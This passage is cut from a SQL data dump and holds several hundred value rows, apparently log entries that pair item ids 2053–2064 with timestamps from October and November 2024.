(14077, NULL, NULL, 2060, 1, '2024-10-14 16:29:18'),
(14078, NULL, NULL, 2062, 1, '2024-10-14 16:29:23'),
(14079, NULL, NULL, 2063, 1, '2024-10-14 16:29:27'),
(14080, NULL, NULL, 2064, 1, '2024-10-14 16:29:32'),
(14081, NULL, NULL, 2055, 1, '2024-10-14 16:30:13'),
(14082, NULL, NULL, 2054, 1, '2024-10-14 16:30:20'),
(14083, NULL, NULL, 2053, 1, '2024-10-14 16:30:28'),
(14084, NULL, NULL, 2058, 1, '2024-10-14 17:36:25'),
(14085, NULL, NULL, 2061, 1, '2024-10-14 17:36:38'),
(14086, NULL, NULL, 2059, 1, '2024-10-14 17:36:52'),
(14087, NULL, NULL, 2060, 1, '2024-10-14 17:37:07'),
(14088, NULL, NULL, 2062, 1, '2024-10-14 17:37:21'),
(14089, NULL, NULL, 2063, 1, '2024-10-14 17:37:36'),
(14090, NULL, NULL, 2064, 1, '2024-10-14 17:37:51'),
(14091, NULL, NULL, 2055, 1, '2024-10-14 17:39:25'),
(14092, NULL, NULL, 2054, 1, '2024-10-14 17:39:30'),
(14093, NULL, NULL, 2053, 1, '2024-10-14 17:39:35'),
(14094, NULL, NULL, 2054, 1, '2024-10-15 00:06:56'),
(14095, NULL, NULL, 2054, 1, '2024-10-15 02:43:01'),
(14096, NULL, NULL, 2062, 1, '2024-10-15 03:06:09'),
(14097, NULL, NULL, 2060, 1, '2024-10-15 12:43:04'),
(14098, NULL, NULL, 2058, 1, '2024-10-15 14:32:20'),
(14099, NULL, NULL, 2054, 1, '2024-10-15 15:51:29'),
(14100, NULL, NULL, 2064, 1, '2024-10-15 18:20:09'),
(14101, NULL, NULL, 2055, 1, '2024-10-15 19:02:31'),
(14102, NULL, NULL, 2054, 1, '2024-10-16 06:51:59'),
(14103, NULL, NULL, 2060, 1, '2024-10-16 11:53:58'),
(14104, NULL, NULL, 2060, 1, '2024-10-16 12:41:16'),
(14105, NULL, NULL, 2054, 1, '2024-10-16 18:39:28'),
(14106, NULL, NULL, 2055, 1, '2024-10-16 18:39:32'),
(14107, NULL, NULL, 2058, 1, '2024-10-16 18:39:36'),
(14108, NULL, NULL, 2059, 1, '2024-10-16 18:39:41'),
(14109, NULL, NULL, 2060, 1, '2024-10-16 18:39:46'),
(14110, NULL, NULL, 2061, 1, '2024-10-16 18:39:50'),
(14111, NULL, NULL, 2062, 1, '2024-10-16 18:39:53'),
(14112, NULL, NULL, 2063, 1, '2024-10-16 18:39:56'),
(14113, NULL, NULL, 2064, 1, '2024-10-16 18:40:09'),
(14114, NULL, NULL, 2064, 1, '2024-10-16 18:40:16'),
(14115, NULL, NULL, 2064, 1, '2024-10-16 18:40:23'),
(14116, NULL, NULL, 2054, 1, '2024-10-16 20:03:57'),
(14117, NULL, NULL, 2062, 1, '2024-10-16 22:51:32'),
(14118, NULL, NULL, 2054, 1, '2024-10-17 02:18:42'),
(14119, NULL, NULL, 2058, 1, '2024-10-17 06:27:53'),
(14120, NULL, NULL, 2059, 1, '2024-10-17 06:27:58'),
(14121, NULL, NULL, 2054, 1, '2024-10-17 10:38:59'),
(14122, NULL, NULL, 2054, 1, '2024-10-17 12:39:13'),
(14123, NULL, NULL, 2062, 1, '2024-10-17 12:50:21'),
(14124, NULL, NULL, 2064, 1, '2024-10-17 13:30:12'),
(14125, NULL, NULL, 2055, 1, '2024-10-17 15:54:03'),
(14126, NULL, NULL, 2064, 1, '2024-10-17 18:39:59'),
(14127, NULL, NULL, 2058, 1, '2024-10-17 18:51:40'),
(14128, NULL, NULL, 2064, 1, '2024-10-17 22:14:13'),
(14129, NULL, NULL, 2058, 1, '2024-10-17 23:24:14'),
(14130, NULL, NULL, 2054, 1, '2024-10-17 23:54:11'),
(14131, NULL, NULL, 2064, 1, '2024-10-18 01:39:18'),
(14132, NULL, NULL, 2059, 1, '2024-10-18 10:49:50'),
(14133, NULL, NULL, 2062, 1, '2024-10-18 11:32:12'),
(14134, NULL, NULL, 2063, 1, '2024-10-18 11:32:13'),
(14135, NULL, NULL, 2062, 1, '2024-10-18 12:31:39'),
(14136, NULL, NULL, 2054, 1, '2024-10-18 12:50:56'),
(14137, NULL, NULL, 2063, 1, '2024-10-18 13:25:01'),
(14138, NULL, NULL, 2061, 1, '2024-10-18 14:59:16'),
(14139, NULL, NULL, 2061, 1, '2024-10-18 15:20:25'),
(14140, NULL, NULL, 2053, 1, '2024-10-18 23:05:03'),
(14141, NULL, NULL, 2054, 1, '2024-10-19 02:00:21'),
(14142, NULL, NULL, 2058, 1, '2024-10-19 05:40:16'),
(14143, NULL, NULL, 2060, 1, '2024-10-19 06:59:38'),
(14144, NULL, NULL, 2063, 1, '2024-10-19 07:09:39'),
(14145, NULL, NULL, 2058, 1, '2024-10-19 07:38:57'),
(14146, NULL, NULL, 2062, 1, '2024-10-19 07:47:30'),
(14147, NULL, NULL, 2055, 1, '2024-10-19 08:39:09'),
(14148, NULL, NULL, 2061, 1, '2024-10-19 10:14:43'),
(14149, NULL, NULL, 2062, 1, '2024-10-19 11:02:33'),
(14150, NULL, NULL, 2063, 1, '2024-10-19 11:25:28'),
(14151, NULL, NULL, 2054, 1, '2024-10-19 12:29:09'),
(14152, NULL, NULL, 2059, 1, '2024-10-19 12:47:14'),
(14153, NULL, NULL, 2064, 1, '2024-10-19 13:03:26'),
(14154, NULL, NULL, 2054, 1, '2024-10-19 13:20:28'),
(14155, NULL, NULL, 2062, 1, '2024-10-19 14:18:53'),
(14156, NULL, NULL, 2063, 1, '2024-10-19 18:35:37'),
(14157, NULL, NULL, 2063, 1, '2024-10-19 21:51:51'),
(14158, NULL, NULL, 2062, 1, '2024-10-19 22:01:13'),
(14159, NULL, NULL, 2063, 1, '2024-10-19 22:44:43'),
(14160, NULL, NULL, 2060, 1, '2024-10-19 23:01:52'),
(14161, NULL, NULL, 2063, 1, '2024-10-19 23:10:27'),
(14162, NULL, NULL, 2060, 1, '2024-10-19 23:20:21'),
(14163, NULL, NULL, 2058, 1, '2024-10-19 23:37:03'),
(14164, NULL, NULL, 2054, 1, '2024-10-20 00:25:55'),
(14165, NULL, NULL, 2055, 1, '2024-10-20 00:34:42'),
(14166, NULL, NULL, 2060, 1, '2024-10-20 01:17:04'),
(14167, NULL, NULL, 2063, 1, '2024-10-20 01:25:57'),
(14168, NULL, NULL, 2058, 1, '2024-10-20 01:54:12'),
(14169, NULL, NULL, 2055, 1, '2024-10-20 02:51:33'),
(14170, NULL, NULL, 2060, 1, '2024-10-20 04:56:49'),
(14171, NULL, NULL, 2063, 1, '2024-10-20 05:12:46'),
(14172, NULL, NULL, 2058, 1, '2024-10-20 06:00:30'),
(14173, NULL, NULL, 2053, 1, '2024-10-20 06:34:03'),
(14174, NULL, NULL, 2055, 1, '2024-10-20 07:34:02'),
(14175, NULL, NULL, 2061, 1, '2024-10-20 10:09:33'),
(14176, NULL, NULL, 2060, 1, '2024-10-20 10:28:59'),
(14177, NULL, NULL, 2054, 1, '2024-10-20 11:26:02'),
(14178, NULL, NULL, 2062, 1, '2024-10-20 11:28:46'),
(14179, NULL, NULL, 2054, 1, '2024-10-20 13:51:22'),
(14180, NULL, NULL, 2059, 1, '2024-10-20 14:21:28'),
(14181, NULL, NULL, 2064, 1, '2024-10-20 14:46:10'),
(14182, NULL, NULL, 2060, 1, '2024-10-20 15:12:05'),
(14183, NULL, NULL, 2064, 1, '2024-10-20 16:28:28'),
(14184, NULL, NULL, 2058, 1, '2024-10-20 16:28:31'),
(14185, NULL, NULL, 2061, 1, '2024-10-20 17:31:23'),
(14186, NULL, NULL, 2054, 1, '2024-10-20 17:36:23'),
(14187, NULL, NULL, 2053, 1, '2024-10-20 17:53:33'),
(14188, NULL, NULL, 2064, 1, '2024-10-20 21:26:25'),
(14189, NULL, NULL, 2058, 1, '2024-10-20 23:51:17'),
(14190, NULL, NULL, 2062, 1, '2024-10-21 01:01:39'),
(14191, NULL, NULL, 2062, 1, '2024-10-21 05:41:13'),
(14192, NULL, NULL, 2059, 1, '2024-10-21 06:35:16'),
(14193, NULL, NULL, 2054, 1, '2024-10-21 07:09:14'),
(14194, NULL, NULL, 2054, 1, '2024-10-21 09:43:17'),
(14195, NULL, NULL, 2064, 1, '2024-10-21 12:04:21'),
(14196, NULL, NULL, 2054, 1, '2024-10-21 13:05:23'),
(14197, NULL, NULL, 2054, 1, '2024-10-21 18:55:00'),
(14198, NULL, NULL, 2054, 1, '2024-10-21 23:09:27'),
(14199, NULL, NULL, 2054, 1, '2024-10-22 02:59:04'),
(14200, NULL, NULL, 2059, 1, '2024-10-22 11:00:38'),
(14201, NULL, NULL, 2054, 1, '2024-10-22 12:12:55'),
(14202, NULL, NULL, 2062, 1, '2024-10-22 14:16:22'),
(14203, NULL, NULL, 2059, 1, '2024-10-22 17:22:20'),
(14204, NULL, NULL, 2059, 1, '2024-10-22 17:22:25'),
(14205, NULL, NULL, 2059, 1, '2024-10-22 17:22:35'),
(14206, NULL, NULL, 2059, 1, '2024-10-22 17:22:53'),
(14207, NULL, NULL, 2060, 1, '2024-10-22 17:50:08'),
(14208, NULL, NULL, 2059, 1, '2024-10-22 22:41:51'),
(14209, NULL, NULL, 2054, 1, '2024-10-22 23:37:09'),
(14210, NULL, NULL, 2054, 1, '2024-10-23 00:08:29'),
(14211, NULL, NULL, 2064, 1, '2024-10-23 03:20:27'),
(14212, NULL, NULL, 2058, 1, '2024-10-23 04:05:28'),
(14213, NULL, NULL, 2054, 1, '2024-10-23 10:49:31'),
(14214, NULL, NULL, 2060, 1, '2024-10-23 10:49:58'),
(14215, NULL, NULL, 2060, 1, '2024-10-23 11:45:56'),
(14216, NULL, NULL, 2059, 1, '2024-10-23 14:00:18'),
(14217, NULL, NULL, 2062, 1, '2024-10-23 16:57:28'),
(14218, NULL, NULL, 2058, 1, '2024-10-23 19:06:27'),
(14219, NULL, NULL, 2054, 1, '2024-10-24 00:21:55'),
(14220, NULL, NULL, 2063, 1, '2024-10-24 07:25:30'),
(14221, NULL, NULL, 2053, 1, '2024-10-24 07:59:16'),
(14222, NULL, NULL, 2064, 1, '2024-10-24 12:04:17'),
(14223, NULL, NULL, 2054, 1, '2024-10-24 12:45:14'),
(14224, NULL, NULL, 2054, 1, '2024-10-24 23:48:19'),
(14225, NULL, NULL, 2061, 1, '2024-10-25 03:24:51'),
(14226, NULL, NULL, 2064, 1, '2024-10-25 04:55:32'),
(14227, NULL, NULL, 2058, 1, '2024-10-25 06:04:50'),
(14228, NULL, NULL, 2064, 1, '2024-10-25 09:38:54'),
(14229, NULL, NULL, 2059, 1, '2024-10-25 09:47:59'),
(14230, NULL, NULL, 2054, 1, '2024-10-25 12:28:15'),
(14231, NULL, NULL, 2063, 1, '2024-10-25 14:15:19'),
(14232, NULL, NULL, 2062, 1, '2024-10-25 19:20:17'),
(14233, NULL, NULL, 2058, 1, '2024-10-25 19:21:15'),
(14234, NULL, NULL, 2064, 1, '2024-10-25 19:23:25'),
(14235, NULL, NULL, 2063, 1, '2024-10-25 21:26:26'),
(14236, NULL, NULL, 2054, 1, '2024-10-26 00:17:09'),
(14237, NULL, NULL, 2055, 1, '2024-10-26 00:23:01'),
(14238, NULL, NULL, 2060, 1, '2024-10-26 08:14:45'),
(14239, NULL, NULL, 2055, 1, '2024-10-26 09:56:30'),
(14240, NULL, NULL, 2060, 1, '2024-10-26 12:45:47'),
(14241, NULL, NULL, 2054, 1, '2024-10-26 14:22:41'),
(14242, NULL, NULL, 2062, 1, '2024-10-26 15:24:33'),
(14243, NULL, NULL, 2063, 1, '2024-10-26 18:28:58'),
(14244, NULL, NULL, 2054, 1, '2024-10-26 20:52:39'),
(14245, NULL, NULL, 2063, 1, '2024-10-27 00:17:08'),
(14246, NULL, NULL, 2054, 1, '2024-10-27 00:19:17'),
(14247, NULL, NULL, 2054, 1, '2024-10-27 01:13:31'),
(14248, NULL, NULL, 2055, 1, '2024-10-27 03:41:36'),
(14249, NULL, NULL, 2064, 1, '2024-10-27 03:41:39'),
(14250, NULL, NULL, 2063, 1, '2024-10-27 03:41:43'),
(14251, NULL, NULL, 2062, 1, '2024-10-27 03:41:46'),
(14252, NULL, NULL, 2060, 1, '2024-10-27 03:41:50'),
(14253, NULL, NULL, 2062, 1, '2024-10-27 07:42:08'),
(14254, NULL, NULL, 2064, 1, '2024-10-27 08:43:46'),
(14255, NULL, NULL, 2061, 1, '2024-10-27 08:53:01'),
(14256, NULL, NULL, 2054, 1, '2024-10-27 10:46:38'),
(14257, NULL, NULL, 2054, 1, '2024-10-27 10:52:03'),
(14258, NULL, NULL, 2063, 1, '2024-10-27 16:15:20'),
(14259, NULL, NULL, 2063, 1, '2024-10-27 16:17:43'),
(14260, NULL, NULL, 2064, 1, '2024-10-27 18:34:10'),
(14261, NULL, NULL, 2062, 1, '2024-10-27 18:54:57'),
(14262, NULL, NULL, 2060, 1, '2024-10-27 19:01:52'),
(14263, NULL, NULL, 2054, 1, '2024-10-27 22:48:33'),
(14264, NULL, NULL, 2062, 1, '2024-10-28 03:33:40'),
(14265, NULL, NULL, 2059, 1, '2024-10-28 03:35:42'),
(14266, NULL, NULL, 2058, 1, '2024-10-28 06:35:11'),
(14267, NULL, NULL, 2064, 1, '2024-10-28 06:43:09'),
(14268, NULL, NULL, 2062, 1, '2024-10-28 06:44:16'),
(14269, NULL, NULL, 2058, 1, '2024-10-28 07:58:27'),
(14270, NULL, NULL, 2054, 1, '2024-10-28 10:22:59'),
(14271, NULL, NULL, 2064, 1, '2024-10-28 11:33:50'),
(14272, NULL, NULL, 2058, 1, '2024-10-28 11:38:26'),
(14273, NULL, NULL, 2059, 1, '2024-10-28 13:28:54'),
(14274, NULL, NULL, 2055, 1, '2024-10-28 19:14:04'),
(14275, NULL, NULL, 2062, 1, '2024-10-28 22:47:19'),
(14276, NULL, NULL, 2064, 1, '2024-10-28 23:10:14'),
(14277, NULL, NULL, 2054, 1, '2024-10-28 23:45:13'),
(14278, NULL, NULL, 2055, 1, '2024-10-29 02:29:53'),
(14279, NULL, NULL, 2064, 1, '2024-10-29 04:24:58'),
(14280, NULL, NULL, 2063, 1, '2024-10-29 08:22:07'),
(14281, NULL, NULL, 2054, 1, '2024-10-29 12:02:55'),
(14282, NULL, NULL, 2060, 1, '2024-10-29 13:42:20'),
(14283, NULL, NULL, 2054, 1, '2024-10-29 23:53:03'),
(14284, NULL, NULL, 2062, 1, '2024-10-30 01:14:40'),
(14285, NULL, NULL, 2059, 1, '2024-10-30 03:21:48'),
(14286, NULL, NULL, 2059, 1, '2024-10-30 03:21:50'),
(14287, NULL, NULL, 2054, 1, '2024-10-30 12:37:57'),
(14288, NULL, NULL, 2064, 1, '2024-10-30 12:55:47'),
(14289, NULL, NULL, 2058, 1, '2024-10-30 12:56:12'),
(14290, NULL, NULL, 2062, 1, '2024-10-30 12:56:21'),
(14291, NULL, NULL, 2064, 1, '2024-10-30 13:15:39'),
(14292, NULL, NULL, 2064, 1, '2024-10-30 13:15:44'),
(14293, NULL, NULL, 2064, 1, '2024-10-30 13:15:49'),
(14294, NULL, NULL, 2059, 1, '2024-10-30 18:42:54'),
(14295, NULL, NULL, 2064, 1, '2024-10-30 19:37:01'),
(14296, NULL, NULL, 2054, 1, '2024-10-31 03:05:26'),
(14297, NULL, NULL, 2064, 1, '2024-10-31 09:16:19'),
(14298, NULL, NULL, 2054, 1, '2024-10-31 11:40:42'),
(14299, NULL, NULL, 2054, 1, '2024-10-31 12:25:13'),
(14300, NULL, NULL, 2061, 1, '2024-10-31 16:03:52'),
(14301, NULL, NULL, 2059, 1, '2024-10-31 23:21:11'),
(14302, NULL, NULL, 2060, 1, '2024-10-31 23:33:39'),
(14303, NULL, NULL, 2058, 1, '2024-11-01 01:47:48'),
(14304, NULL, NULL, 2053, 1, '2024-11-01 02:55:43'),
(14305, NULL, NULL, 2061, 1, '2024-11-01 05:51:42'),
(14306, NULL, NULL, 2054, 1, '2024-11-01 10:43:44'),
(14307, NULL, NULL, 2060, 1, '2024-11-01 11:29:37'),
(14308, NULL, NULL, 2059, 1, '2024-11-01 12:22:11'),
(14309, NULL, NULL, 2064, 1, '2024-11-01 12:55:09'),
(14310, NULL, NULL, 2061, 1, '2024-11-01 13:23:46'),
(14311, NULL, NULL, 2054, 1, '2024-11-01 14:54:24'),
(14312, NULL, NULL, 2058, 1, '2024-11-01 16:03:53'),
(14313, NULL, NULL, 2060, 1, '2024-11-01 18:37:10'),
(14314, NULL, NULL, 2064, 1, '2024-11-01 20:03:53'),
(14315, NULL, NULL, 2064, 1, '2024-11-01 23:14:35'),
(14316, NULL, NULL, 2062, 1, '2024-11-02 02:00:11'),
(14317, NULL, NULL, 2058, 1, '2024-11-02 02:11:00'),
(14318, NULL, NULL, 2053, 1, '2024-11-02 03:01:26'),
(14319, NULL, NULL, 2054, 1, '2024-11-02 06:31:44'),
(14320, NULL, NULL, 2063, 1, '2024-11-02 06:57:18'),
(14321, NULL, NULL, 2063, 1, '2024-11-02 06:57:22'),
(14322, NULL, NULL, 2061, 1, '2024-11-02 09:24:30'),
(14323, NULL, NULL, 2061, 1, '2024-11-02 10:16:50'),
(14324, NULL, NULL, 2055, 1, '2024-11-02 17:27:10'),
(14325, NULL, NULL, 2059, 1, '2024-11-02 17:27:10'),
(14326, NULL, NULL, 2060, 1, '2024-11-02 17:27:10'),
(14327, NULL, NULL, 2063, 1, '2024-11-02 17:27:10'),
(14328, NULL, NULL, 2058, 1, '2024-11-02 17:27:10'),
(14329, NULL, NULL, 2064, 1, '2024-11-02 17:27:10'),
(14330, NULL, NULL, 2061, 1, '2024-11-02 17:27:10'),
(14331, NULL, NULL, 2062, 1, '2024-11-02 17:27:10'),
(14332, NULL, NULL, 2055, 1, '2024-11-02 20:16:10'),
(14333, NULL, NULL, 2054, 1, '2024-11-03 00:44:42'),
(14334, NULL, NULL, 2054, 1, '2024-11-03 04:23:38'),
(14335, NULL, NULL, 2064, 1, '2024-11-03 05:14:53'),
(14336, NULL, NULL, 2054, 1, '2024-11-03 10:49:22'),
(14337, NULL, NULL, 2061, 1, '2024-11-04 05:13:12'),
(14338, NULL, NULL, 2060, 1, '2024-11-04 09:31:51'),
(14339, NULL, NULL, 2059, 1, '2024-11-04 11:25:32'),
(14340, NULL, NULL, 2059, 1, '2024-11-04 12:08:48'),
(14341, NULL, NULL, 2064, 1, '2024-11-04 13:34:43'),
(14342, NULL, NULL, 2064, 1, '2024-11-04 13:40:09'),
(14343, NULL, NULL, 2062, 1, '2024-11-04 13:40:11'),
(14344, NULL, NULL, 2058, 1, '2024-11-04 13:40:59'),
(14345, NULL, NULL, 2060, 1, '2024-11-04 13:43:04'),
(14346, NULL, NULL, 2060, 1, '2024-11-04 13:50:06'),
(14347, NULL, NULL, 2060, 1, '2024-11-04 14:14:46'),
(14348, NULL, NULL, 2063, 1, '2024-11-04 14:23:54'),
(14349, NULL, NULL, 2058, 1, '2024-11-04 14:52:30'),
(14350, NULL, NULL, 2055, 1, '2024-11-04 15:50:56'),
(14351, NULL, NULL, 2060, 1, '2024-11-04 17:47:07'),
(14352, NULL, NULL, 2063, 1, '2024-11-04 17:55:38'),
(14353, NULL, NULL, 2060, 1, '2024-11-04 18:39:43'),
(14354, NULL, NULL, 2063, 1, '2024-11-04 18:48:07'),
(14355, NULL, NULL, 2058, 1, '2024-11-04 19:15:11'),
(14356, NULL, NULL, 2055, 1, '2024-11-04 20:11:42'),
(14357, NULL, NULL, 2061, 1, '2024-11-04 21:43:51'),
(14358, NULL, NULL, 2060, 1, '2024-11-04 22:42:08'),
(14359, NULL, NULL, 2063, 1, '2024-11-04 22:50:54'),
(14360, NULL, NULL, 2058, 1, '2024-11-04 23:19:28'),
(14361, NULL, NULL, 2055, 1, '2024-11-05 00:17:38'),
(14362, NULL, NULL, 2061, 1, '2024-11-05 01:49:14'),
(14363, NULL, NULL, 2063, 1, '2024-11-05 02:25:58'),
(14364, NULL, NULL, 2062, 1, '2024-11-05 02:27:26'),
(14365, NULL, NULL, 2054, 1, '2024-11-05 03:36:13'),
(14366, NULL, NULL, 2059, 1, '2024-11-05 03:50:08'),
(14367, NULL, NULL, 2064, 1, '2024-11-05 04:01:00'),
(14368, NULL, NULL, 2060, 1, '2024-11-05 04:28:03'),
(14369, NULL, NULL, 2063, 1, '2024-11-05 04:36:15'),
(14370, NULL, NULL, 2058, 1, '2024-11-05 05:01:12'),
(14371, NULL, NULL, 2054, 1, '2024-11-05 05:59:25'),
(14372, NULL, NULL, 2060, 1, '2024-11-05 07:06:58'),
(14373, NULL, NULL, 2063, 1, '2024-11-05 07:15:39'),
(14374, NULL, NULL, 2058, 1, '2024-11-05 07:44:25'),
(14375, NULL, NULL, 2055, 1, '2024-11-05 08:45:33'),
(14376, NULL, NULL, 2054, 1, '2024-11-05 09:45:05'),
(14377, NULL, NULL, 2061, 1, '2024-11-05 10:24:01'),
(14378, NULL, NULL, 2062, 1, '2024-11-05 11:03:15'),
(14379, NULL, NULL, 2054, 1, '2024-11-05 12:11:42'),
(14380, NULL, NULL, 2059, 1, '2024-11-05 12:25:32'),
(14381, NULL, NULL, 2064, 1, '2024-11-05 12:36:06'),
(14382, NULL, NULL, 2055, 1, '2024-11-05 13:10:14'),
(14383, NULL, NULL, 2062, 1, '2024-11-05 14:52:44'),
(14384, NULL, NULL, 2060, 1, '2024-11-05 15:29:54'),
(14385, NULL, NULL, 2063, 1, '2024-11-05 15:39:05'),
(14386, NULL, NULL, 2064, 1, '2024-11-05 16:04:54'),
(14387, NULL, NULL, 2064, 1, '2024-11-05 16:05:07'),
(14388, NULL, NULL, 2064, 1, '2024-11-05 16:05:07'),
(14389, NULL, NULL, 2058, 1, '2024-11-05 16:07:49'),
(14390, NULL, NULL, 2060, 1, '2024-11-05 17:45:38'),
(14391, NULL, NULL, 2063, 1, '2024-11-05 18:04:19'),
(14392, NULL, NULL, 2059, 1, '2024-11-05 18:29:05'),
(14393, NULL, NULL, 2059, 1, '2024-11-05 18:50:27'),
(14394, NULL, NULL, 2058, 1, '2024-11-05 19:00:55'),
(14395, NULL, NULL, 2054, 1, '2024-11-05 19:47:13'),
(14396, NULL, NULL, 2055, 1, '2024-11-05 20:53:41'),
(14397, NULL, NULL, 2061, 1, '2024-11-05 23:59:28'),
(14398, NULL, NULL, 2060, 1, '2024-11-06 00:50:01'),
(14399, NULL, NULL, 2063, 1, '2024-11-06 01:00:40'),
(14400, NULL, NULL, 2064, 1, '2024-11-06 01:21:06'),
(14401, NULL, NULL, 2058, 1, '2024-11-06 01:34:55'),
(14402, NULL, NULL, 2058, 1, '2024-11-06 01:35:01'),
(14403, NULL, NULL, 2055, 1, '2024-11-06 02:45:14'),
(14404, NULL, NULL, 2061, 1, '2024-11-06 04:38:05'),
(14405, NULL, NULL, 2062, 1, '2024-11-06 05:25:56'),
(14406, NULL, NULL, 2063, 1, '2024-11-06 06:22:16'),
(14407, NULL, NULL, 2054, 1, '2024-11-06 06:50:23'),
(14408, NULL, NULL, 2059, 1, '2024-11-06 07:07:28'),
(14409, NULL, NULL, 2064, 1, '2024-11-06 07:21:07'),
(14410, NULL, NULL, 2054, 1, '2024-11-06 11:11:25'),
(14411, NULL, NULL, 2054, 1, '2024-11-06 14:42:19'),
(14412, NULL, NULL, 2060, 1, '2024-11-06 15:36:42'),
(14413, NULL, NULL, 2063, 1, '2024-11-06 15:46:57'),
(14414, NULL, NULL, 2058, 1, '2024-11-06 16:17:25'),
(14415, NULL, NULL, 2055, 1, '2024-11-06 17:18:32'),
(14416, NULL, NULL, 2062, 1, '2024-11-06 18:26:05'),
(14417, NULL, NULL, 2054, 1, '2024-11-06 18:28:16'),
(14418, NULL, NULL, 2055, 1, '2024-11-06 18:28:18'),
(14419, NULL, NULL, 2064, 1, '2024-11-06 18:28:26'),
(14420, NULL, NULL, 2063, 1, '2024-11-06 18:28:28'),
(14421, NULL, NULL, 2062, 1, '2024-11-06 18:28:30'),
(14422, NULL, NULL, 2060, 1, '2024-11-06 18:28:32'),
(14423, NULL, NULL, 2059, 1, '2024-11-06 18:28:34'),
(14424, NULL, NULL, 2061, 1, '2024-11-06 18:28:45'),
(14425, NULL, NULL, 2058, 1, '2024-11-06 18:28:51'),
(14426, NULL, NULL, 2061, 1, '2024-11-06 19:00:12'),
(14427, NULL, NULL, 2060, 1, '2024-11-06 19:40:03'),
(14428, NULL, NULL, 2063, 1, '2024-11-06 19:52:26'),
(14429, NULL, NULL, 2064, 1, '2024-11-06 20:26:06'),
(14430, NULL, NULL, 2062, 1, '2024-11-06 20:27:18'),
(14431, NULL, NULL, 2058, 1, '2024-11-06 20:30:53'),
(14432, NULL, NULL, 2058, 1, '2024-11-06 20:51:24'),
(14433, NULL, NULL, 2055, 1, '2024-11-06 21:46:55'),
(14434, NULL, NULL, 2061, 1, '2024-11-06 23:43:55'),
(14435, NULL, NULL, 2062, 1, '2024-11-07 00:33:30'),
(14436, NULL, NULL, 2060, 1, '2024-11-07 01:13:57'),
(14437, NULL, NULL, 2063, 1, '2024-11-07 01:21:40'),
(14438, NULL, NULL, 2058, 1, '2024-11-07 01:48:18'),
(14439, NULL, NULL, 2064, 1, '2024-11-07 02:40:54'),
(14440, NULL, NULL, 2055, 1, '2024-11-07 02:42:20'),
(14441, NULL, NULL, 2058, 1, '2024-11-07 03:43:46'),
(14442, NULL, NULL, 2061, 1, '2024-11-07 04:10:29'),
(14443, NULL, NULL, 2054, 1, '2024-11-07 04:39:33'),
(14444, NULL, NULL, 2062, 1, '2024-11-07 04:43:53'),
(14445, NULL, NULL, 2054, 1, '2024-11-07 05:45:26'),
(14446, NULL, NULL, 2059, 1, '2024-11-07 05:58:02'),
(14447, NULL, NULL, 2064, 1, '2024-11-07 06:08:07'),
(14448, NULL, NULL, 2060, 1, '2024-11-07 07:23:34'),
(14449, NULL, NULL, 2063, 1, '2024-11-07 07:32:32'),
(14450, NULL, NULL, 2058, 1, '2024-11-07 08:00:32'),
(14451, NULL, NULL, 2055, 1, '2024-11-07 08:58:50'),
(14452, NULL, NULL, 2061, 1, '2024-11-07 10:35:49'),
(14453, NULL, NULL, 2062, 1, '2024-11-07 11:15:11'),
(14454, NULL, NULL, 2054, 1, '2024-11-07 12:25:03'),
(14455, NULL, NULL, 2059, 1, '2024-11-07 12:39:08'),
(14456, NULL, NULL, 2064, 1, '2024-11-07 12:50:07'),
(14457, NULL, NULL, 2055, 1, '2024-11-07 13:02:34'),
(14458, NULL, NULL, 2060, 1, '2024-11-07 19:09:14'),
(14459, NULL, NULL, 2063, 1, '2024-11-07 19:17:03'),
(14460, NULL, NULL, 2058, 1, '2024-11-07 19:44:26'),
(14461, NULL, NULL, 2055, 1, '2024-11-07 20:38:09'),
(14462, NULL, NULL, 2061, 1, '2024-11-07 22:06:54'),
(14463, NULL, NULL, 2062, 1, '2024-11-07 22:42:37'),
(14464, NULL, NULL, 2054, 1, '2024-11-07 23:46:46'),
(14465, NULL, NULL, 2059, 1, '2024-11-08 00:00:32'),
(14466, NULL, NULL, 2064, 1, '2024-11-08 00:10:17'),
(14467, NULL, NULL, 2060, 1, '2024-11-08 00:50:08'),
(14468, NULL, NULL, 2063, 1, '2024-11-08 00:57:56'),
(14469, NULL, NULL, 2058, 1, '2024-11-08 01:23:43'),
(14470, NULL, NULL, 2055, 1, '2024-11-08 02:18:34'),
(14471, NULL, NULL, 2061, 1, '2024-11-08 03:47:52'),
(14472, NULL, NULL, 2058, 1, '2024-11-08 04:18:54'),
(14473, NULL, NULL, 2062, 1, '2024-11-08 04:25:19'),
(14474, NULL, NULL, 2054, 1, '2024-11-08 05:30:10'),
(14475, NULL, NULL, 2059, 1, '2024-11-08 05:42:55'),
(14476, NULL, NULL, 2064, 1, '2024-11-08 05:52:47'),
(14477, NULL, NULL, 2054, 1, '2024-11-08 06:34:51'),
(14478, NULL, NULL, 2059, 1, '2024-11-08 08:17:44'),
(14479, NULL, NULL, 2054, 1, '2024-11-08 08:39:27'),
(14480, NULL, NULL, 2061, 1, '2024-11-08 10:28:55'),
(14481, NULL, NULL, 2064, 1, '2024-11-08 10:30:52'),
(14482, NULL, NULL, 2064, 1, '2024-11-08 12:53:37'),
(14483, NULL, NULL, 2061, 1, '2024-11-08 15:06:46'),
(14484, NULL, NULL, 2064, 1, '2024-11-08 15:09:16'),
(14485, NULL, NULL, 2060, 1, '2024-11-08 22:24:27'),
(14486, NULL, NULL, 2063, 1, '2024-11-08 22:40:57'),
(14487, NULL, NULL, 2058, 1, '2024-11-08 23:28:18'),
(14488, NULL, NULL, 2055, 1, '2024-11-09 01:01:57'),
(14489, NULL, NULL, 2061, 1, '2024-11-09 01:34:49'),
(14490, NULL, NULL, 2060, 1, '2024-11-09 01:37:28'),
(14491, NULL, NULL, 2063, 1, '2024-11-09 01:46:36'),
(14492, NULL, NULL, 2058, 1, '2024-11-09 02:12:24'),
(14493, NULL, NULL, 2055, 1, '2024-11-09 03:05:24'),
(14494, NULL, NULL, 2060, 1, '2024-11-09 03:41:40'),
(14495, NULL, NULL, 2063, 1, '2024-11-09 03:51:18'),
(14496, NULL, NULL, 2058, 1, '2024-11-09 04:22:30'),
(14497, NULL, NULL, 2055, 1, '2024-11-09 05:20:39'),
(14498, NULL, NULL, 2061, 1, '2024-11-09 06:55:36'),
(14499, NULL, NULL, 2062, 1, '2024-11-09 07:36:24'),
(14500, NULL, NULL, 2060, 1, '2024-11-09 09:02:39'),
(14501, NULL, NULL, 2063, 1, '2024-11-09 09:10:57'),
(14502, NULL, NULL, 2058, 1, '2024-11-09 09:35:33'),
(14503, NULL, NULL, 2055, 1, '2024-11-09 10:24:44'),
(14504, NULL, NULL, 2061, 1, '2024-11-09 11:45:37'),
